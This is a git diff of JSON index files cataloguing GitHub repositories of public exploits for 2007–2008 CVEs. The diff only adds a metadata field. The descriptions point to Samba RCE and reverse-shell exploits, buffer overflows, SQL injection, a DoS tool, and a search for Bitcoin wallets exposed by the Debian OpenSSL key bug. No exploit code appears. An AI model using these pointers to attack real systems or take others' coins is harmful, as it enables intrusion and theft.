"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2007-1567", "description": "CVE-2007-1567 - WarFTP 1.65 'USER' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", diff --git a/2007/CVE-2007-1858.json b/2007/CVE-2007-1858.json index 0049d0e3c7..2ccbbbdc23 100644 --- a/2007/CVE-2007-1858.json +++ b/2007/CVE-2007-1858.json @@ -7,7 +7,8 @@ "login": "anthophilee", "id": 75995332, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75995332?v=4", - "html_url": "https:\/\/github.com\/anthophilee" + "html_url": "https:\/\/github.com\/anthophilee", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/anthophilee\/A2SV--SSL-VUL-Scan", "description": "A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https:\/\/github.com\/hahwul\/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device", diff --git a/2007/CVE-2007-2447.json b/2007/CVE-2007-2447.json index fd9d6ed99a..fb96249d56 100644 --- a/2007/CVE-2007-2447.json +++ b/2007/CVE-2007-2447.json @@ -7,7 +7,8 @@ "login": "amriunix", "id": 6618368, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6618368?v=4", - "html_url": "https:\/\/github.com\/amriunix" + "html_url": "https:\/\/github.com\/amriunix", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/amriunix\/CVE-2007-2447", "description": "CVE-2007-2447 - Samba usermap script", @@ -37,7 +38,8 @@ "login": "Unix13", "id": 52569108, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52569108?v=4", - "html_url": "https:\/\/github.com\/Unix13" + "html_url": "https:\/\/github.com\/Unix13", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Unix13\/metasploitable2", "description": "PHP-CGI-REMOTE_CVE-2012-1823, UnrealIRCd, MySQL, PostgreSQL and SSH bruteforce, VSFTPD2.3.4, samba CVE-2007-2447, JAVA RMI Server, distcc daemon, misconfigured NFS files, etc.", @@ -67,7 +69,8 @@ "login": "b1fair", "id": 43326124, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43326124?v=4", - "html_url": "https:\/\/github.com\/b1fair" + "html_url": "https:\/\/github.com\/b1fair", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/b1fair\/smb_usermap", "description": "A simple exploit for CVE-2007-2447", @@ -97,7 +100,8 @@ "login": "JoseBarrios", "id": 794342, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/794342?v=4", - "html_url": "https:\/\/github.com\/JoseBarrios" + "html_url": "https:\/\/github.com\/JoseBarrios", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JoseBarrios\/CVE-2007-2447", "description": "Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to execute arbitrary commands by specifying a Samba username containing shell meta characters.", @@ -127,7 +131,8 @@ "login": "3x1t1um", "id": 54857145, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54857145?v=4", - "html_url": "https:\/\/github.com\/3x1t1um" + "html_url": "https:\/\/github.com\/3x1t1um", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/3x1t1um\/CVE-2007-2447", "description": null, @@ -157,7 +162,8 @@ "login": "xlcc4096", "id": 75581853, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75581853?v=4", - "html_url": "https:\/\/github.com\/xlcc4096" + "html_url": "https:\/\/github.com\/xlcc4096", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xlcc4096\/exploit-CVE-2007-2447", "description": "Exploit for the vulnerability CVE-2007-2447", @@ -187,7 +193,8 @@ "login": "WildfootW", "id": 11520473, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11520473?v=4", - "html_url": "https:\/\/github.com\/WildfootW" + "html_url": "https:\/\/github.com\/WildfootW", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/WildfootW\/CVE-2007-2447_Samba_3.0.25rc3", "description": null, @@ -217,7 +224,8 @@ "login": "Ziemni", "id": 22441278, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22441278?v=4", - "html_url": "https:\/\/github.com\/Ziemni" + "html_url": "https:\/\/github.com\/Ziemni", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Ziemni\/CVE-2007-2447-in-Python", "description": "Python implementation of 'Username' map script' RCE Exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).", @@ -247,7 +255,8 @@ "login": "0xKn", "id": 80174242, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80174242?v=4", - "html_url": "https:\/\/github.com\/0xKn" + "html_url": "https:\/\/github.com\/0xKn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xKn\/CVE-2007-2447", "description": null, @@ -277,7 +286,8 @@ "login": "ozuma", "id": 1208361, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1208361?v=4", - "html_url": "https:\/\/github.com\/ozuma" + "html_url": "https:\/\/github.com\/ozuma", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ozuma\/CVE-2007-2447", "description": "Exploit Samba", @@ -307,7 +317,8 @@ "login": "un4gi", "id": 47873286, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47873286?v=4", - "html_url": "https:\/\/github.com\/un4gi" + "html_url": "https:\/\/github.com\/un4gi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/un4gi\/CVE-2007-2447", "description": "Samba 3.0.20 username map script exploit", @@ -337,7 +348,8 @@ "login": "G01d3nW01f", "id": 75846902, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", - "html_url": "https:\/\/github.com\/G01d3nW01f" + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2007-2447", "description": "cve-2007-2447 this script was rewrite the part of Metasploit modules to python3", @@ -367,7 +379,8 @@ "login": "cherrera0001", "id": 19656010, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19656010?v=4", - "html_url": "https:\/\/github.com\/cherrera0001" + "html_url": "https:\/\/github.com\/cherrera0001", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cherrera0001\/CVE-2007-2447", "description": " Samba usermap script.", @@ -397,7 +410,8 @@ "login": "Alien0ne", "id": 73351962, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73351962?v=4", - "html_url": "https:\/\/github.com\/Alien0ne" + "html_url": "https:\/\/github.com\/Alien0ne", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Alien0ne\/CVE-2007-2447", "description": "CVE-2007-2447 - Samba usermap script", @@ -427,7 +441,8 @@ "login": "3t4n", "id": 16639269, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16639269?v=4", - "html_url": "https:\/\/github.com\/3t4n" + "html_url": "https:\/\/github.com\/3t4n", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/3t4n\/samba-3.0.24-CVE-2007-2447-vunerable-", "description": null, @@ -457,7 +472,8 @@ "login": "xbufu", "id": 49696158, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49696158?v=4", - "html_url": "https:\/\/github.com\/xbufu" + "html_url": "https:\/\/github.com\/xbufu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xbufu\/CVE-2007-2447", "description": "Exploit code for CVE-2007-2447 written in Python3.", @@ -487,7 +503,8 @@ "login": "s4msec", "id": 75855533, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75855533?v=4", - "html_url": "https:\/\/github.com\/s4msec" + "html_url": "https:\/\/github.com\/s4msec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/s4msec\/CVE-2007-2447", "description": null, @@ -517,7 +534,8 @@ "login": "0xConstant", "id": 51972282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", - "html_url": "https:\/\/github.com\/0xConstant" + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xConstant\/CVE-2007-2447", "description": null, @@ -547,7 +565,8 @@ "login": "Nosferatuvjr", "id": 67665267, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67665267?v=4", - "html_url": "https:\/\/github.com\/Nosferatuvjr" + "html_url": "https:\/\/github.com\/Nosferatuvjr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nosferatuvjr\/Samba-Usermap-exploit", "description": "CVE-2007-2447", @@ -577,7 +596,8 @@ "login": "testaross4", "id": 105503572, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105503572?v=4", - "html_url": "https:\/\/github.com\/testaross4" + "html_url": "https:\/\/github.com\/testaross4", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/testaross4\/CVE-2007-2447", "description": null, @@ -607,7 +627,8 @@ "login": "mr-l0n3lly", "id": 24935413, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24935413?v=4", - "html_url": "https:\/\/github.com\/mr-l0n3lly" + "html_url": "https:\/\/github.com\/mr-l0n3lly", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mr-l0n3lly\/CVE-2007-2447", "description": "CVE-2007-2447 samba remote code execution", @@ -637,7 +658,8 @@ "login": "HerculesRD", "id": 73125772, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73125772?v=4", - "html_url": "https:\/\/github.com\/HerculesRD" + "html_url": "https:\/\/github.com\/HerculesRD", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HerculesRD\/PyUsernameMapScriptRCE", "description": "CVE-2007-2447 exploit written in python to get reverse shell", @@ -667,7 +689,8 @@ "login": "Aviksaikat", "id": 31238298, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31238298?v=4", - "html_url": "https:\/\/github.com\/Aviksaikat" + "html_url": "https:\/\/github.com\/Aviksaikat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Aviksaikat\/CVE-2007-2447", "description": "automated script for exploiting CVE-2007-2447", @@ -697,7 +720,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/CVE-2007-2447", "description": "Exploit Samba smbd 3.0.20-Debian", @@ -727,7 +751,8 @@ "login": "bdunlap9", "id": 23561759, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23561759?v=4", - "html_url": "https:\/\/github.com\/bdunlap9" + "html_url": "https:\/\/github.com\/bdunlap9", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bdunlap9\/CVE-2007-2447_python", "description": "Exploit i used in HTB", @@ -757,7 +782,8 @@ "login": "MikeRega7", "id": 114309996, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114309996?v=4", - "html_url": "https:\/\/github.com\/MikeRega7" + "html_url": "https:\/\/github.com\/MikeRega7", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MikeRega7\/CVE-2007-2447-RCE", "description": "Samba 3.0.20", @@ -787,7 +813,8 @@ "login": "0xTabun", "id": 144548207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144548207?v=4", - "html_url": "https:\/\/github.com\/0xTabun" + "html_url": "https:\/\/github.com\/0xTabun", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xTabun\/CVE-2007-2447", "description": "Samba Reverse Shell", @@ -817,7 +844,8 @@ "login": "ShivamDey", "id": 87941867, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87941867?v=4", - "html_url": "https:\/\/github.com\/ShivamDey" + "html_url": "https:\/\/github.com\/ShivamDey", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ShivamDey\/Samba-CVE-2007-2447-Exploit", "description": null, @@ -847,7 +875,8 @@ "login": "Juantos", "id": 22524318, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22524318?v=4", - "html_url": "https:\/\/github.com\/Juantos" + "html_url": "https:\/\/github.com\/Juantos", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Juantos\/cve-2007-2447", "description": "Samba 3.0.0 - 3.0.25rc3", @@ -877,7 +906,8 @@ "login": "IamLucif3r", "id": 53969258, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53969258?v=4", - "html_url": "https:\/\/github.com\/IamLucif3r" + "html_url": "https:\/\/github.com\/IamLucif3r", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/IamLucif3r\/CVE-2007-2447-Exploit", "description": "This is a exploit for CVE-2007-2447; Vulnerable SMB ", diff --git a/2007/CVE-2007-3280.json b/2007/CVE-2007-3280.json index b46fdc0756..8674585826 100644 --- a/2007/CVE-2007-3280.json +++ b/2007/CVE-2007-3280.json @@ -7,7 +7,8 @@ "login": "DenuwanJayasekara", "id": 181200406, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181200406?v=4", - "html_url": "https:\/\/github.com\/DenuwanJayasekara" + "html_url": "https:\/\/github.com\/DenuwanJayasekara", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DenuwanJayasekara\/CVE-Exploitation-Reports", "description": "CVE Exploitation Reports: CVE-2007-3280, CVE-2017-0144, CVE-2019-0708", diff --git a/2007/CVE-2007-3830.json b/2007/CVE-2007-3830.json index f5afbfbd41..4623a868e4 100644 --- a/2007/CVE-2007-3830.json +++ b/2007/CVE-2007-3830.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2007-3830", "description": "IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities", diff --git a/2007/CVE-2007-3831.json b/2007/CVE-2007-3831.json index 2373bb589c..38eadd24d4 100644 --- a/2007/CVE-2007-3831.json +++ b/2007/CVE-2007-3831.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2007-3831", "description": "PHP remote file inclusion in main.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5 ", diff --git a/2007/CVE-2007-4559.json b/2007/CVE-2007-4559.json index 037135bf18..89f822efbb 100644 --- a/2007/CVE-2007-4559.json +++ b/2007/CVE-2007-4559.json @@ -7,7 +7,8 @@ "login": "advanced-threat-research", "id": 27901279, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27901279?v=4", - "html_url": "https:\/\/github.com\/advanced-threat-research" + "html_url": "https:\/\/github.com\/advanced-threat-research", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/advanced-threat-research\/Creosote", "description": "Creosote is our solution to searching for the tarfile vulnerability described by CVE-2007-4559.", @@ -37,7 +38,8 @@ "login": "Ooscaar", "id": 60936394, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60936394?v=4", - "html_url": "https:\/\/github.com\/Ooscaar" + "html_url": "https:\/\/github.com\/Ooscaar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Ooscaar\/MALW", "description": "CVE-2007-4559 - Polemarch exploit", @@ -67,7 +69,8 @@ "login": "davidholiday", "id": 7077306, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7077306?v=4", - "html_url": "https:\/\/github.com\/davidholiday" + "html_url": "https:\/\/github.com\/davidholiday", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/davidholiday\/CVE-2007-4559", "description": null, @@ -97,7 +100,8 @@ "login": "luigigubello", "id": 27034386, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27034386?v=4", - "html_url": "https:\/\/github.com\/luigigubello" + "html_url": "https:\/\/github.com\/luigigubello", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/luigigubello\/trellix-tarslip-patch-bypass", "description": "Bypass for CVE-2007-4559 Trellix patch", @@ -127,7 +131,8 @@ "login": "JamesDarf", "id": 96758146, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96758146?v=4", - "html_url": "https:\/\/github.com\/JamesDarf" + "html_url": "https:\/\/github.com\/JamesDarf", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JamesDarf\/tarpioka", "description": "YISF 2024 CTF-Web (Directory Traversal via \".tar\" file, CVE-2007-4559), easy", diff --git a/2007/CVE-2007-4560.json b/2007/CVE-2007-4560.json index be4693c557..b6e5ae282f 100644 --- a/2007/CVE-2007-4560.json +++ b/2007/CVE-2007-4560.json @@ -7,7 +7,8 @@ "login": "0x1sac", "id": 121731764, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121731764?v=4", - "html_url": "https:\/\/github.com\/0x1sac" + "html_url": "https:\/\/github.com\/0x1sac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0x1sac\/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution", "description": "Exploit for CVE-2007-4560 (ClamAV Milter Sendmail 0.91.2 Remote Code Execution)", diff --git a/2007/CVE-2007-4607.json b/2007/CVE-2007-4607.json index 9620fc0128..d4235b57e4 100644 --- a/2007/CVE-2007-4607.json +++ b/2007/CVE-2007-4607.json @@ -7,7 +7,8 @@ "login": "joeyrideout", "id": 4960269, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4960269?v=4", - "html_url": "https:\/\/github.com\/joeyrideout" + "html_url": "https:\/\/github.com\/joeyrideout", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/joeyrideout\/CVE-2007-4607", "description": "Make CVE-2007-4607 exploitable again!", diff --git a/2007/CVE-2007-5036.json b/2007/CVE-2007-5036.json index 450c348fe0..f862e0de76 100644 --- a/2007/CVE-2007-5036.json +++ b/2007/CVE-2007-5036.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2007-5036", "description": "Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service \/ Buffer Overflow (PoC)", diff --git a/2007/CVE-2007-5962.json b/2007/CVE-2007-5962.json index cc917f300e..b036b13b66 100644 --- a/2007/CVE-2007-5962.json +++ b/2007/CVE-2007-5962.json @@ -7,7 +7,8 @@ "login": "antogit-sys", "id": 64706936, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64706936?v=4", - "html_url": "https:\/\/github.com\/antogit-sys" + "html_url": "https:\/\/github.com\/antogit-sys", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/antogit-sys\/CVE-2007-5962", "description": "vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption", diff --git a/2007/CVE-2007-6377.json b/2007/CVE-2007-6377.json index 3a149e13ed..27ecd38914 100644 --- a/2007/CVE-2007-6377.json +++ b/2007/CVE-2007-6377.json @@ -7,7 +7,8 @@ "login": "Nicoslo", "id": 64541498, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64541498?v=4", - "html_url": "https:\/\/github.com\/Nicoslo" + "html_url": "https:\/\/github.com\/Nicoslo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nicoslo\/Windows-exploitation-BadBlue-2.7-CVE-2007-6377", "description": null, diff --git a/2007/CVE-2007-6638.json b/2007/CVE-2007-6638.json index e54d43c2c5..b8ae213ffa 100644 --- a/2007/CVE-2007-6638.json +++ b/2007/CVE-2007-6638.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2007-6638", "description": "March Networks DVR 3204 - Logfile Information Disclosure", diff --git a/2008/CVE-2008-0128.json b/2008/CVE-2008-0128.json index 94e83cffe5..6659db7bb3 100644 --- a/2008/CVE-2008-0128.json +++ b/2008/CVE-2008-0128.json @@ -7,7 +7,8 @@ "login": "ngyanch", "id": 26293983, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26293983?v=4", - "html_url": "https:\/\/github.com\/ngyanch" + "html_url": "https:\/\/github.com\/ngyanch", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ngyanch\/4062-1", "description": "CVE-2008-0128", diff --git a/2008/CVE-2008-0166.json b/2008/CVE-2008-0166.json index 2473320e56..76a0b6cb22 100644 --- a/2008/CVE-2008-0166.json +++ b/2008/CVE-2008-0166.json @@ -7,7 +7,8 @@ "login": "g0tmi1k", "id": 535942, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/535942?v=4", - "html_url": "https:\/\/github.com\/g0tmi1k" + "html_url": "https:\/\/github.com\/g0tmi1k", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/g0tmi1k\/debian-ssh", "description": "Debian OpenSSL Predictable PRNG (CVE-2008-0166)", @@ -39,7 +40,8 @@ "login": "avarx", "id": 1161946, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1161946?v=4", - "html_url": "https:\/\/github.com\/avarx" + "html_url": "https:\/\/github.com\/avarx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/avarx\/vulnkeys", "description": "Debian OpenSSL Predictable PRNG (CVE-2008-0166)", @@ -69,7 +71,8 @@ "login": "badkeys", "id": 97682451, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97682451?v=4", - "html_url": "https:\/\/github.com\/badkeys" + "html_url": "https:\/\/github.com\/badkeys", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/badkeys\/debianopenssl", "description": "Private keys vulnerable to Debian OpenSSL bug (CVE-2008-0166)", @@ -99,7 +102,8 @@ "login": "demining", "id": 87700947, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87700947?v=4", - "html_url": "https:\/\/github.com\/demining" + "html_url": "https:\/\/github.com\/demining", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/demining\/Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166", "description": "Search for BTC coins on earlier versions of Bitcoin Core with critical vulnerability OpenSSL 0.9.8 CVE-2008-0166", diff --git a/2008/CVE-2008-0228.json b/2008/CVE-2008-0228.json index a0d9b7b309..e6345f66cd 100644 --- a/2008/CVE-2008-0228.json +++ b/2008/CVE-2008-0228.json @@ -7,7 +7,8 @@ "login": "SpiderLabs", "id": 508521, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/508521?v=4", - "html_url": "https:\/\/github.com\/SpiderLabs" + "html_url": "https:\/\/github.com\/SpiderLabs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SpiderLabs\/TWSL2011-007_iOS_code_workaround", "description": "Workaround for the vulnerability identified by TWSL2011-007 or CVE-2008-0228 - iOS x509 Certificate Chain Validation Vulnerability", diff --git a/2008/CVE-2008-1611.json b/2008/CVE-2008-1611.json index 40b9b43c30..6774f2c800 100644 --- a/2008/CVE-2008-1611.json +++ b/2008/CVE-2008-1611.json @@ -7,7 +7,8 @@ "login": "Axua", "id": 28788087, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28788087?v=4", - "html_url": "https:\/\/github.com\/Axua" + "html_url": "https:\/\/github.com\/Axua", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Axua\/CVE-2008-1611", "description": "CVE-2008-1611 TFTP 1.41 buffer overflow exploit in the filepath", diff --git a/2008/CVE-2008-1613.json b/2008/CVE-2008-1613.json index 7447880333..ff14a9b822 100644 --- a/2008/CVE-2008-1613.json +++ b/2008/CVE-2008-1613.json @@ -7,7 +7,8 @@ "login": "SECFORCE", "id": 8157384, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", - "html_url": "https:\/\/github.com\/SECFORCE" + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2008-1613", "description": "RedDot CMS versions 7.5 Build 7.5.0.48 and below full database enumeration exploit that takes advantage of a remote SQL injection vulnerability in ioRD.asp.", diff --git a/2008/CVE-2008-2019.json b/2008/CVE-2008-2019.json index 33f4ffba0f..70d67f199e 100644 --- a/2008/CVE-2008-2019.json +++ b/2008/CVE-2008-2019.json @@ -7,7 +7,8 @@ "login": "TheRook", "id": 521783, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/521783?v=4", - "html_url": "https:\/\/github.com\/TheRook" + "html_url": "https:\/\/github.com\/TheRook", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/TheRook\/AudioCaptchaBypass-CVE-2008-2019", "description": null, diff --git a/2008/CVE-2008-2938.json b/2008/CVE-2008-2938.json index 97a24b371e..13c42139be 100644 --- a/2008/CVE-2008-2938.json +++ b/2008/CVE-2008-2938.json @@ -7,7 +7,8 @@ "login": "Naramsim", "id": 8996268, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8996268?v=4", - "html_url": "https:\/\/github.com\/Naramsim" + "html_url": "https:\/\/github.com\/Naramsim", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Naramsim\/Offensive", "description": "Reproducible exploits for: CVE-2016-1240 CVE-2008-2938 CVE-2014-2064 CVE-2014-1904", diff --git a/2008/CVE-2008-3531.json b/2008/CVE-2008-3531.json index 051ac838c1..c072bc3d8e 100644 --- a/2008/CVE-2008-3531.json +++ b/2008/CVE-2008-3531.json @@ -7,7 +7,8 @@ "login": "test-one9", "id": 175934231, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/175934231?v=4", - "html_url": "https:\/\/github.com\/test-one9" + "html_url": "https:\/\/github.com\/test-one9", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/test-one9\/ps4-11.50.github.io", "description": "ps4 cve-2008-3531", diff --git a/2008/CVE-2008-4109.json b/2008/CVE-2008-4109.json index 32ac3ee504..827e1b27db 100644 --- a/2008/CVE-2008-4109.json +++ b/2008/CVE-2008-4109.json @@ -7,7 +7,8 @@ "login": "bigb0x", "id": 13532434, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", - "html_url": "https:\/\/github.com\/bigb0x" + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-6387", "description": "Bulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2006-5051 , CVE-2008-4109 and others.", diff --git a/2008/CVE-2008-4250.json b/2008/CVE-2008-4250.json index b9451dd38e..136328aebf 100644 --- a/2008/CVE-2008-4250.json +++ b/2008/CVE-2008-4250.json @@ -7,7 +7,8 @@ "login": "thunderstrike9090", "id": 28643644, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28643644?v=4", - "html_url": "https:\/\/github.com\/thunderstrike9090" + "html_url": "https:\/\/github.com\/thunderstrike9090", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/thunderstrike9090\/Conflicker_analysis_scripts", "description": "Scripts to analyze conflicker worm which exploits famous netapi vulnerability (CVE-2008-4250) i.e MS08-067", diff --git a/2008/CVE-2008-4609.json b/2008/CVE-2008-4609.json index 1f587879b4..cdff4d23e1 100644 --- a/2008/CVE-2008-4609.json +++ b/2008/CVE-2008-4609.json @@ -7,7 +7,8 @@ "login": "mrclki", "id": 75611002, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75611002?v=4", - "html_url": "https:\/\/github.com\/mrclki" + "html_url": "https:\/\/github.com\/mrclki", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mrclki\/sockstress", "description": "Sockstress (CVE-2008-4609) DDoS implementation written in Go", diff --git a/2008/CVE-2008-4654.json b/2008/CVE-2008-4654.json index 1ea33059c5..a7e732ebb0 100644 --- a/2008/CVE-2008-4654.json +++ b/2008/CVE-2008-4654.json @@ -7,7 +7,8 @@ "login": "bongbongco", "id": 3170006, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3170006?v=4", - "html_url": "https:\/\/github.com\/bongbongco" + "html_url": "https:\/\/github.com\/bongbongco", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bongbongco\/CVE-2008-4654", "description": "VideoLAN VLC media player 0.9.4 Media Player ty.c buffer overflow", @@ -37,7 +38,8 @@ "login": "KernelErr", "id": 45716019, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45716019?v=4", - "html_url": "https:\/\/github.com\/KernelErr" + "html_url": "https:\/\/github.com\/KernelErr", + 